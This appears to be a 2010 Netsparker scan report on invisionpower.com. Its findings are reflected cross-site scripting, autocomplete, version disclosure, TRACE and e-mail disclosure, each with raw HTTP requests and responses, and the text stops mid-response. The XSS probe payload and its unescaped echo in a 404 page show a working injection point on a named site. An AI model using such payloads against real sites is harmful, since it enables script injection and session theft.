appcomponent	GET	billing
module	GET	order_wizard
do	GET	step2
Query Based	QUERYSTRING	'"--><script>alert(0x000C4D)</script>

Request

GET /index.php?'"--><script>netsparker(0x000C4D)</script> HTTP/1.1
Referer: https://www.invisionpower.com/index.php?appcomponent=billing&module=order_wizard&section=order&type=packages&list=209
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:42:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3058
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Invision Power Services :: 404 File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Skipping CSS load as inherit is on */@import url( 'https://www.invisionpower.com/public/style_images//css_1.css' );@import url( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
@import url( 'https://www.invisionpower.com/ipscss/ipsmenu.css' );
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]></script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( /&/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verify-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='site_search'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type="hidden" name="cx" value="003857263146498806944:jkwuw2zfm7i" /><input type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Search...' onfocus="if(this.value=='Search...'){this.value='';this.className='on'}" onblur="if(this.value==''){this.value='Search...';this.className='off'}" /><input type='submit' value='Go' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>corporate</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>business</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hosting</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>resources</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Client Area'>client area</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|customer)\/.*$/i, "$1" );
var _id = '';

switch( _folder )
{
default:
case 'corporate':
_id = 'corp';
break;
case 'community':
case 'business':
case 'hosting':
_id = _folder;
break;
case 'customer':
_id = 'client';
break;
}

document.getElementById( 'li_' + _id ).className = 'selected';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>


<div id='body_container'>
<div id='menu'>
<div class='content_menu'>
<span class='panel_top'></span>
<ul>

<li><a href="http://forums.invisionpower.com" title="">Company Forums</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Client Area</a>

<ul></ul>
</li>
</ul>
<span class='panel_bottom'></span>
</div>

<br /><br /><br /><br /><br /><br />

<div class='side_box'>
<h5>Call us</h5>
We are on hand to answer your queries!<br /><br />

<span class='tel_no'>1-800-901-5491</span><br />
<span class='tel_info'>toll free</span><br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside usa</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value="add" checked>Subscribe
<input name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="email address" maxlength="128" class="ml_text" onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" /><br />

<input type='submit' name='Submit' value='Sign up' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File Not Found</h2>
If you feel you have reached this page in error please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href='http://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>bug tracker</a> and let us know how you got here.
<br /> <br />
/index.php?'"--><script>netsparker(0x000C4D)</script>
</div> </div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contact Us'>Contact Us</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Company Forums'>Company Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Client Area'>Client Area</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Service Statement'>Service Statement</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
var lpPosY = 100;
</script>


<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script> <div id='ipd-msg-wrapper' class='error_box' style='display:none'> <div id='ipd-msg-title'> <h3><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Close Window' class='ipd'></a>   Site Message</h3> </div> <p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA[show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task' border='0' height='1' width='1' /></body>
</html>

Auto Complete Enabled

1 TOTAL

LOW

CONFIRMED

"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

See the remedy for the solution.
Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

Using AutoComplete in HTML Forms

- /ccs_forums_install/admin/

/ccs_forums_install/admin/ CONFIRMED

http://www.invisionpower.com/ccs_forums_install/admin/

Identified Field Name

password

Request

Response

Apache Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /assets/

/assets/

http://www.invisionpower.com/assets/

Extracted Version

Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

Request

GET /assets/ HTTP/1.1
Referer: http://www.invisionpower.com/assets//css/general.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Date: Wed, 22 Sep 2010 22:16:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Content-Length: 57
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<h1>Invision Power Services</h1>Access denied. <i>403</i>

PHP Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

- /assets/

/assets/

http://www.invisionpower.com/assets/

Extracted Version

Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

Request

Response

OpenSSL Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.

Impact

An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /assets/

/assets/

http://www.invisionpower.com/assets/

Extracted Version

Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

Request

Response

Apache Module Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

- /assets/

/assets/

http://www.invisionpower.com/assets/

Extracted Version

Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2

Request

Response

TRACE / TRACK Identified

1 TOTAL

LOW

CONFIRMED

Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /index.php

/index.php CONFIRMED

https://www.invisionpower.com/index.php

Request

TRACE /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:16:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: session_id=f018738443286a79b19a7c920cbda3ef; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 21 Sep 2010 22:16:22 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 4223
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Invision Power Services | Community and Forum Software</title>
<meta name='description' content='Providers of industry leading forum software and integrated blog, gallery, chat and more. At Invision Power Services, we make communities easy.' /><link rel='canonical' href='http://www.invisionpower.com/index.php' />
<link rel="stylesheet" type="text/css" media="screen" href="http://www.invisionpower.com/assets//css/general.css" />

<script type='text/javascript'>
jsDebug = true;
</script>

<script type='text/javascript' src='http://www.invisionpower.com/assets//js/prototype.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/effects.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/ips.js'></script>
<script src="http://www.invisionpower.com/assets//js/cufon/cufon-yui.js" type="text/javascript"></script>
<script src="http://www.invisionpower.com/assets//js/cufon/Myriad_Pro_Light_300.font.js" type="text/javascript"></script>
<script type="text/javascript">
Cufon.replace('h1.cufon');
Cufon.replace('h2.cufon');

ips.delegate.initialize();
</script>
</head>
<body>
<div id='header'>
<div id='masthead'>
<a href='http://www.invisionpower.com' title='IPS, Inc. Homepage' id='branding'><img src='http://www.invisionpower.com/assets//images/logo.png' alt='Logo' /></a>
</div>
</div>
<div id='outer_container'>
<div id=''>
<ul id='primary_navigation'>
<li id='nav_products' class='selected'>
<a href='http://www.invisionpower.com/suite/'>Our Suite</a>
<ul id='nav_products_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/suite/' title='The IPS Platform'>The IPS Platform</a></li>
<li><a href='http://www.invisionpower.com/products/' title='See all products'>Product Line-up</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/board/' title='IP.Board Forum Software'>IP.Board</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/blog/' title='Go to IP.Blog'>IP.Blog</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/gallery/' title='Go to IP.Gallery'>IP.Gallery</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/content/' title='Go to IP.Content'>IP.Content</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/chat/' title='Go to IP.Chat'>IP.Chat</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/downloads/' title='Go to IP.Downloads'>IP.Downloads</a></li>

<li class='sep'><a href='http://www.invisionpower.com/products/spammonitor/' title='Go to Spam Monitor'>Spam Monitoring</a></li>
<li><a href='http://www.invisionpower.com/suite/iphone' title='Go to iPhone application'>iPhone Application</a></li>
<li><a href='http://www.invisionpower.com/suite/convert.php' title='Convert to IPS software'>Convert to IPS</a></li>
<li><a href='http://www.invisionpower.com/suite/requirements.php' title='Suite requiremenets'>Suite requirements</a></li>
<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try our products'>Try our suite free</a></li>

</ul>
<script type='text/javascript'>
ips.menus['products'] = new ips.menu( $('nav_products'), $('nav_products_menu') );
</script>
</li>
<li id='nav_hosted'>
<a href='/hosting'>Hosted Communities</a>
<ul id='nav_hosted_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/hosting/' title='Go to standard packages'>Standard Packages</a></li>
<li><a href='http://www.invisionpower.com/hosting/advanced.php' title='Go to Advanced packages'>Advanced Packages</a></li>
</ul>
<script type='text/javascript'>
ips.menus['hosted'] = new ips.menu( $('nav_hosted'), $('nav_hosted_menu') );
</script>
</li>
<li id='nav_services'>
<a href='http://www.invisionpower.com/services/' title='Go to our Services overview'>Services</a>
</li>
<li id='nav_support'>
<a href='#'>Support</a>
<ul id='nav_support_menu' class='main_menu'>
<li><a href='http://community.invisionpower.com/resources/documentation/index.html' title='Documentation'> Documentation </a></li>
<li><a href='/customer/' title='Go to the client area'>Client Area</a></li>
<li><a href='http://community.invisionpower.com/index.php?app=ccs' title='Go to the resource site'>Resources</a></li>
<li><a href='http://community.invisionpower.com' title='Our community support forums'>Support Forums</a></li>

<li><a href='http://www.invisionpower.com/company/faq.php' title='Go to the FAQs'>FAQs</a></li>
<li><a href='http://www.invisionpower.com/hosting/status.php' title=''>Network Status</a></li>
</ul>
<script type='text/javascript'>
ips.menus['support'] = new ips.menu( $('nav_support'), $('nav_support_menu') );
</script>
</li>
<li id='nav_store'>
<a href='http://www.invisionpower.com/store/' title='Go to the store'>Store</a>
</li>
<li id='nav_community'>
<a href='http://community.invisionpower.com/' title='Visit our own community'>Our Community</a>
</li>
<li id='nav_contact'><a href='http://www.invisionpower.com/company/contact.php' title='Get in touch'>Contact Us »</a></li>
</ul>
</div>
<div id='container'>

<div id='frontpage_feature'>
<h1>We make communities easy - we're leading providers of community forum software</h1>
</div>
<div id='latest_news'>
<div>
<strong>Latest News</strong>
<ul id='ticker'>

<li><span class='date'>Sep 07 2010</span> <a href='http://community.invisionpower.com/topic/320838-ipboard-31x-security-patch-released/' title='View item' rel='nofollow'>IP.Board 3.1.x Security Patch Released</a></li>

<li><span class='date'>Aug 02 2010</span> <a href='http://community.invisionpower.com/topic/317877-enhancements-to-ips-support-and-services/' title='View item' rel='nofollow'>Enhancements to IPS Support and Services</a></li>

<li><span class='date'>Jul 20 2010</span> <a href='http://community.invisionpower.com/topic/316584-ipboard-312-and-applications-released/' title='View item' rel='nofollow'>IP.Board 3.1.2 and Applications Released</a></li>

<li><span class='date'>Jul 13 2010</span> <a href='http://community.invisionpower.com/topic/315976-donations-for-autism-research-and-support/' title='View item' rel='nofollow'>Donations for Autism Research and Support</a></li>

</ul>
</div>
</div>
<script type='text/javascript'>
var ticker = new ips.ticker( $('ticker'), { duration: 4 } );
</script>

<br /><br />
<div style='width: 600px; float: left;'>
<p style='font-size: 18px; line-height: 140%; color: #303030;'>
<strong>Forum software, content management, blogs, photo galleries, and more.</strong>
</p>
<p style='font-size: 14px; line-height: 140%; margin-top: 15px;'>
We build software and services that make it simple for you to create and nurture an online forum. Our powerful platform can be self-hosted, or managed by us for you.
<br /><br />
We have over 10 years experience in building and hosting forum software. See what our products can do to see why sites large and small choose IPS community software to power <em>their</em> forums and communities.
</p>
<br /><br />
<span id='homepage_action'><a href='http://www.invisionpower.com/suite/demo.php' id='button_demo' class='button'>Try Us For Free</a> or <a href='http://www.invisionpower.com/suite/'>see our platform →</a></span>
</div>

<div style='width: 280px; float: right; border-left: 1px solid #dedede; padding-left: 20px;'>
<h2 class='cufon'>Latest Blogs</h2>

<ul id='blog_feed'>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5344-gallery-4-structural-changes/' rel='nofollow bookmark' title='Gallery 4 - Structural Changes'>Gallery 4 - Structural Changes</a></h3>
<span class='date'><abbr class="published" title="2010-09-22T07:08:00+00:00">Today, 07:08 AM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5296-ipcontent-21-dev-update-tighter-forum-integration/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: Tighter Forum Integration'>IP.Content 2.1 Dev Update: Tighter Forum Integration</a></h3>
<span class='date'><abbr class="published" title="2010-09-20T12:51:38+00:00">Sep 20 2010 12:51 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5336-ipgallery-40-manifesto/' rel='nofollow bookmark' title='IP.Gallery 4.0 - Manifesto'>IP.Gallery 4.0 - Manifesto</a></h3>
<span class='date'><abbr class="published" title="2010-09-17T15:25:00+00:00">Sep 17 2010 03:25 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5295-ipcontent-21-dev-update-more-control/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: More Control'>IP.Content 2.1 Dev Update: More Control</a></h3>
<span class='date'><abbr class="published" title="2010-09-16T13:22:27+00:00">Sep 16 2010 01:22 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5294-ipcontent-21-dev-update-block-improvements/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: Block Improvements'>IP.Content 2.1 Dev Update: Block Improvements</a></h3>
<span class='date'><abbr class="published" title="2010-09-13T18:53:06+00:00">Sep 13 2010 06:53 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5293-ipcontent-21-dev-update-template-updates/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: Template Updates'>IP.Content 2.1 Dev Update: Template Updates</a></h3>
<span class='date'><abbr class="published" title="2010-09-02T20:45:00+00:00">Sep 02 2010 08:45 PM</abbr></span>
</li>
</ul>

</div>

<br class='clear' /><br /><br />
<hr />

<h2 class='cufon'>Powering communities across the globe</h2>
<div id='homepage_customers'>
<img src='http://www.invisionpower.com/assets//images/logos/logo_oreilly.png' alt="O'Reilly Media, Inc." />
<img src='http://www.invisionpower.com/assets//images/logos/logo_nasa.png' alt='NASA' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_emi.png' alt='EMI' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_intuit.png' alt='Intuit Canada ULC' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_nbc.png' alt='NBC Studios' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_skype.png' alt='Skype' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_falcons.png' alt='Atlanta Falcons' />
</div>

</div>
</div>
<div id='footer_wrap'>
<div id='footer'>
<div class='footer_block' id='support_sales'>
<h2 class='cufon'>Support & Sales</h2>
<span class='phone'>1-800-901-5491</span><br />
<span class='phone sub'>+1 804-200-5695</span> <em>outside US</em>
</div>
<div class='footer_block' id='newsletter'>
<h2 class='cufon'>IPS Newsletter</h2>
<span>
Get occasional IPS news & updates.
</span>
<form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
<fieldset>
<input type='hidden' name='redirect' value="http://www.invisionpower.com/company/mailing_list_thanks.php" />
<input type='hidden' name='errorredirect' value="http://www.invisionpower.com/company/mailing_list_error.php" />
<input type='hidden' name="listid" value="156944">
<input type='hidden' name="specialid:156944" value="J7MU">
<input type='hidden' name='clientid' value="335011">
<input type='hidden' name='formid' value="11094">
<input type='hidden' name='reallistid' value="1">
<input type='hidden' name='doubleopt' value="1">

<input type='text' name="fields_email" class='input_text' value='email address' onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" />
<input type="submit" name="Submit" value="Subscribe" id='button_newsletter' class='input_submit button' />
</fieldset>
</form>
</div>
<div class='footer_block' id='about_us'>
<h2 class='cufon'>About Us</h2>
For 10 years, we've been leading providers of community & forum software to individuals and business.
</div>
</div>
</div>
<div id='footer_links'>
<a href='http://www.invisionpower.com/legal/privacy.php'>Privacy Policy</a>
<a href='http://www.invisionpower.com/company/standards.php'>Standards of Service</a>
<a href='http://www.invisionpower.com/legal/hosting_policies.php'>Hosting Policies</a>
<a href='http://community.invisionpower.com'>IPS Company Forums</a>
<br />
<span id='copyright'>© 2009 Invision Power Services, Inc. (Powered by IP.Content)</span>
</div>
<script type="text/javascript"> Cufon.now(); </script>
<script id="pap_x2s6df8d" src="http://affiliate.invisionpower.com/scripts/clickjs.php" type="text/javascript">
</script>
<script type="text/javascript">

</script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2199880-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
<img src='/ccs_forums_install/index.php?app=core&module=task' alt='' style='border: 0px;height:1px;width:1px;' /></body>
</html>

Forbidden Resource

1 TOTAL

INFORMATION

CONFIRMED

Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.

- /assets/

/assets/ CONFIRMED

http://www.invisionpower.com/assets/

Request

Response

E-mail Address Disclosure

1 TOTAL

INFORMATION

Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Wikipedia - E-Mail Spam

- /company/standards.php

/company/standards.php

http://www.invisionpower.com/company/standards.php

Found E-mails

info@invisionpower.com

Request

GET /company/standards.php HTTP/1.1
Referer: https://www.invisionpower.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:16:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: session_id=8be672ec47505079997ee85f995eb752; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 21 Sep 2010 22:16:38 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 7431
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>IPS Standards of Service</title>
<meta name='description' content='Our Standards of Service set out what you can expect from us when you purchase our products or services.' /><link rel='canonical' href='http://www.invisionpower.com/company/standards.php' />
<link rel="stylesheet" type="text/css" media="screen" href="http://www.invisionpower.com/assets//css/general.css" />
<link rel='stylesheet' type='text/css' media='screen' href='http://www.invisionpower.com/assets/css/misc.css' />
<script type='text/javascript'>
jsDebug = true;
</script>

<script type='text/javascript' src='http://www.invisionpower.com/assets//js/prototype.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/effects.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/ips.js'></script>
<script src="http://www.invisionpower.com/assets//js/cufon/cufon-yui.js" type="text/javascript"></script>
<script src="http://www.invisionpower.com/assets//js/cufon/Myriad_Pro_Light_300.font.js" type="text/javascript"></script>
<script type="text/javascript">
Cufon.replace('h1.cufon');
Cufon.replace('h2.cufon');

ips.delegate.initialize();
</script>
</head>
<body>
<div id='header'>
<div id='masthead'>
<a href='http://www.invisionpower.com' title='IPS, Inc. Homepage' id='branding'><img src='http://www.invisionpower.com/assets//images/logo.png' alt='Logo' /></a>
</div>
</div>
<div id='outer_container'>
<div id=''>
<ul id='primary_navigation'>
<li id='nav_products' class='selected'>
<a href='http://www.invisionpower.com/suite/'>Our Suite</a>
<ul id='nav_products_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/suite/' title='The IPS Platform'>The IPS Platform</a></li>
<li><a href='http://www.invisionpower.com/products/' title='See all products'>Product Line-up</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/board/' title='IP.Board Forum Software'>IP.Board</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/blog/' title='Go to IP.Blog'>IP.Blog</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/gallery/' title='Go to IP.Gallery'>IP.Gallery</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/content/' title='Go to IP.Content'>IP.Content</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/chat/' title='Go to IP.Chat'>IP.Chat</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/downloads/' title='Go to IP.Downloads'>IP.Downloads</a></li>

<li class='sep'><a href='http://www.invisionpower.com/products/spammonitor/' title='Go to Spam Monitor'>Spam Monitoring</a></li>
<li><a href='http://www.invisionpower.com/suite/iphone' title='Go to iPhone application'>iPhone Application</a></li>
<li><a href='http://www.invisionpower.com/suite/convert.php' title='Convert to IPS software'>Convert to IPS</a></li>
<li><a href='http://www.invisionpower.com/suite/requirements.php' title='Suite requiremenets'>Suite requirements</a></li>
